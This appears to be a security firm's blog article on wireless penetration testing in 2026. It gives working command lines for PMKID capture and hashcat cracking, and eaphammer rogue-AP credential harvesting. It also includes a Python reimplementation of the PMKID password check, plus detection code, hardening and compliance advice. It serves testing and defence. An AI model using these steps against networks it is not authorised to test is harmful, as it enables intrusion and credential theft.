Last updated: April 26, 2026
Wireless pentesting in 2026 has shifted. WPA2 is being phased out in enterprise; WPA3 is the new floor; corporate Wi-Fi increasingly uses 802.1X with EAP-TLS. Yet the practical attack surface remains substantial — WPA3 transition mode, weak PSKs, captive portal abuse, evil twin attacks, PMKID extraction. This article covers the wireless attacks that work in 2026, the toolchain (hcxdumptool, hashcat, airgeddon, eaphammer), and the enterprise wireless hardening that closes them.
The state of wireless security
WPA3 introduces SAE (Simultaneous Authentication of Equals) replacing the WPA2 4-way handshake. SAE makes offline cracking harder. But:
- WPA3 transition mode — networks supporting both WPA2 and WPA3 simultaneously. An attacker forces clients onto WPA2, cracks the WPA2 handshake, and bypasses WPA3 entirely.
- Dragonblood vulnerabilities (CVE-2019-9494/9495/9496/9497/9498/9499) — side-channel attacks against SAE allowed offline password recovery on early WPA3 implementations. Largely patched, but legacy hardware persists.
- Weak SAE passwords — even WPA3 falls to dictionary attacks if the PSK is “Welcome2024” or similar.
- EAP misconfiguration in 802.1X enterprise networks remains common — relay attacks, downgrade to weaker auth methods.
The PMKID attack (still works)
PMKID extraction is the modern WPA2 attack that doesn’t require capturing a full handshake. The Access Point includes the PMKID in the first message of the 4-way handshake, so an attacker only needs to start an association with the AP; no connected client has to be present or deauthenticated.
# Capture PMKIDs (hcxdumptool 6.3+ writes the capture with -w; older releases used -o and --enable_status=1):
sudo hcxdumptool -i wlan0 -w capture.pcapng
# Convert to hashcat's 22000 format (PMKID and EAPOL records go in the same file):
hcxpcapngtool -o hash.hc22000 capture.pcapng
# Crack with hashcat (mode 22000 covers both PMKID and 4-way handshake records):
hashcat -m 22000 hash.hc22000 rockyou.txt --rules-file best64.rule
If the PSK appears in any commonly known wordlist (rockyou, hashes.org), it cracks. Indian SOHO routers ship with default passwords like admin123, and ISP routers use defaultpass or similar — extremely vulnerable.
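The derivation behind that hashcat run, as an added example that is not from the article: a candidate passphrase and the SSID give the PMK, the PMK plus the two MAC addresses give the PMKID, and a match means the PSK is recovered. The hc22000 record, SSID and MAC addresses below are constructed; point the same check at a capture of your own AP to see how little stands between a parking-lot PMKID and a weak PSK.

```python
import hashlib
import hmac

# Added example, not from the article: the WPA2 PMK -> PMKID derivation that hashcat
# mode 22000 repeats for every guess. Pointing it at a capture of your own AP shows
# that nothing but PSK entropy stands between a parking-lot PMKID and the network.


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    # PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA) for the WPA2-PSK AKM
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def parse_hc22000(line: str) -> dict:
    # hcxpcapngtool record layout: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_HEX***  (01 = PMKID record)
    f = line.strip().split("*")
    if len(f) < 6 or f[0] != "WPA" or f[1] != "01":
        raise ValueError("not a type-01 (PMKID) hc22000 line")
    return {"pmkid": bytes.fromhex(f[2]), "ap_mac": bytes.fromhex(f[3]),
            "sta_mac": bytes.fromhex(f[4]), "ssid": bytes.fromhex(f[5]).decode()}


def pmkid_matches(line: str, candidate: str) -> bool:
    # One hashcat "guess": derive the PMK for the candidate and compare the resulting PMKID.
    h = parse_hc22000(line)
    pmk = derive_pmk(candidate, h["ssid"])
    return hmac.compare_digest(derive_pmkid(pmk, h["ap_mac"], h["sta_mac"]), h["pmkid"])


def make_hc22000(ssid: str, ap_mac: str, sta_mac: str, passphrase: str) -> str:
    # Constructed sample record (MACs and SSID are made up), laid out as hcxpcapngtool emits it.
    aa, spa = bytes.fromhex(ap_mac), bytes.fromhex(sta_mac)
    pmkid = derive_pmkid(derive_pmk(passphrase, ssid), aa, spa)
    return f"WPA*01*{pmkid.hex()}*{ap_mac}*{sta_mac}*{ssid.encode().hex()}***"


if __name__ == "__main__":
    record = make_hc22000("CORP-GUEST", "0a1b2c3d4e5f", "a0b1c2d3e4f5", "Welcome2024")
    print(record)
    print("weak PSK recovered:", pmkid_matches(record, "Welcome2024"))
```

Each guess costs 4096 PBKDF2 rounds, which is why a dictionary PSK falls in minutes on a GPU while a 32-character random one does not.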
Evil twin / captive portal attack
Set up a rogue AP with the same SSID as the target. Clients (especially those configured with “auto-connect to known networks”) associate to your AP. Capture the WPA2/WPA3 attempt or serve a captive portal that prompts for the password.
Tools: airgeddon, fluxion, wifipumpkin3. Modern variants serve a fake “router firmware update” page that looks like the actual brand of the target.
WPA Enterprise (802.1X) attacks
Corporate Wi-Fi typically uses EAP-TLS (certificate-based) or EAP-PEAP/MSCHAPv2 (password-based). Each has its own attacks.
EAP-TLS
If the client doesn’t validate the server certificate properly, a rogue AP presenting its own certificate is accepted:
# With eaphammer:
eaphammer -i wlan0 --essid CORP-WIFI --auth wpa-eap --creds
# Brings up a rogue AP with its own RADIUS server presenting eaphammer's certificate
# Clients that skip server-certificate validation continue the EAP exchange and hand over credentials
EAP-PEAP/MSCHAPv2
The MSCHAPv2 challenge/response can be cracked offline:
# Capture the challenge/response with eaphammer (the --creds run above writes it in hashcat format)
# Crack with asleap or hashcat (mode 5500, NetNTLMv1/MSCHAPv2):
hashcat -m 5500 mschap.hash rockyou.txt
Mitigation: enforce server certificate validation on all clients, use EAP-TLS with mutual auth.
Detection — what works
- WIPS (Wireless Intrusion Prevention System) — Cisco Meraki, Aruba ClearPass, dedicated WIPS sensors. Detect rogue APs by SSID/BSSID anomalies.
- Spectrum analysis — periodic walks of facility with a wireless analyzer (Ekahau, NetSpot, Acrylic Wi-Fi Analyzer) — find unauthorised APs.
- Client behaviour anomalies — clients deauthenticating and reassociating frequently can indicate an evil-twin attack.
- RADIUS log analysis — failed authentications, unusual EAP versions, unknown supplicants.
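Two of these signals in code, as an added example that is not from the article: a BSSID beaconing a corporate SSID that is missing from the authorised inventory, and a client cycling through deauth/reassoc within a short window. The inventory and the management-frame events are constructed; a WIPS export or a tshark field dump would supply the real ones.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Added example, not from the article: two of the detection signals above (rogue BSSID
# beaconing a corporate SSID; a client cycling through deauth/reassoc) run over constructed
# 802.11 management events. The inventory and event records are made up for illustration.

CORP_SSIDS = {"CORP-WIFI"}
AUTHORISED_BSSIDS = {"CORP-WIFI": {"00:11:22:aa:bb:01", "00:11:22:aa:bb:02"}}

# (timestamp, frame subtype, BSSID, client MAC or None, SSID or None) - constructed sample
EVENTS = [
    ("2026-04-26T09:00:00", "beacon", "00:11:22:aa:bb:01", None, "CORP-WIFI"),
    ("2026-04-26T09:00:05", "beacon", "de:ad:be:ef:00:01", None, "CORP-WIFI"),
    ("2026-04-26T09:00:06", "deauth", "00:11:22:aa:bb:01", "f0:f1:f2:00:00:07", None),
    ("2026-04-26T09:00:08", "assoc", "de:ad:be:ef:00:01", "f0:f1:f2:00:00:07", "CORP-WIFI"),
    ("2026-04-26T09:00:20", "deauth", "00:11:22:aa:bb:01", "f0:f1:f2:00:00:07", None),
    ("2026-04-26T09:00:22", "assoc", "de:ad:be:ef:00:01", "f0:f1:f2:00:00:07", "CORP-WIFI"),
    ("2026-04-26T09:00:40", "deauth", "00:11:22:aa:bb:01", "f0:f1:f2:00:00:07", None),
    ("2026-04-26T09:00:41", "assoc", "00:11:22:aa:bb:01", "f0:f1:f2:00:00:07", "CORP-WIFI"),
    ("2026-04-26T09:30:00", "assoc", "00:11:22:aa:bb:02", "f0:f1:f2:00:00:09", "CORP-WIFI"),
]


def rogue_aps(events):
    """BSSIDs beaconing a corporate SSID but absent from the authorised inventory."""
    found = set()
    for _, subtype, bssid, _, ssid in events:
        if subtype == "beacon" and ssid in CORP_SSIDS:
            if bssid not in AUTHORISED_BSSIDS.get(ssid, set()):
                found.add((bssid, ssid))
    return sorted(found)


def churning_clients(events, window=timedelta(minutes=2), threshold=3):
    """Clients with at least `threshold` deauth+reassoc cycles inside any sliding window."""
    per_client = defaultdict(list)
    for ts, subtype, _, client, _ in events:
        if subtype in ("deauth", "assoc") and client:
            per_client[client].append(datetime.fromisoformat(ts))
    flagged = {}
    for client, times in per_client.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            cycles = (end - start + 1) // 2  # one deauth plus one reassoc per cycle
            if cycles >= threshold:
                flagged[client] = max(flagged.get(client, 0), cycles)
    return flagged
```

On the sample, the rogue BSSID and the churning client are the same incident seen from two angles: the client is knocked off the real AP and lands on the impostor each time.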
Hardening for enterprise wireless
- WPA3 only (no transition mode) where client base supports it
- Strong PSKs (32+ characters, random) for guest / personal-mode networks
- EAP-TLS for enterprise auth, not PEAP
- Server certificate validation enforced on every client (MDM-pushed Wi-Fi profiles)
- Rotate Wi-Fi credentials annually
- Segregate wireless guests in separate VLAN with strict egress controls
- WIPS deployed and monitored
- Disable Wi-Fi Protected Setup (WPS) — historically vulnerable to PIN brute force
How to find your next wireless finding
For attackers (legitimate red-team):
- Walk the perimeter with hcxdumptool. Capture PMKIDs from every visible AP. Crack offline.
- For corporate networks, run eaphammer to test client cert validation.
- Test guest network for VLAN escape — can you reach corporate IPs from the guest segment?
For defenders:
- Audit the Wi-Fi profile pushed via MDM — does it require server certificate validation?
- Run a wireless walk-around quarterly. Document AP inventory; investigate unknown SSIDs / BSSIDs.
- Test guest segregation — provision a guest credential and try to reach internal hosts.
Compliance angle
- RBI Cyber Framework — wireless security requirements explicitly cover EAP-TLS adoption and WIPS.
- SEBI CSCRF — wireless infrastructure for Q-RE / MII has specific hardening expectations.
- PCI-DSS Requirement 4 / 11.1 — wireless protection of cardholder data; rogue AP detection.
- ISO 27001:2022 A.8.21, A.8.22 — network security and segregation.
The takeaway
Wireless attacks in 2026 favour the patient attacker. Capture PMKIDs from the parking lot; crack offline at home; return with credentials. The defender’s leverage is in cert-based authentication, strong PSKs, and continuous wireless monitoring. Run hcxdumptool against your own perimeter; the resulting hash is your weakest-link PSK. If it cracks within an hour against rockyou, every WPA2 client on your network is at risk.
Get a VAPT scoping call
Senior practitioner-led VAPT — not a checklist run by juniors. CVSS-scored findings, free retest, attestation letter. India's SMBs and SaaS teams.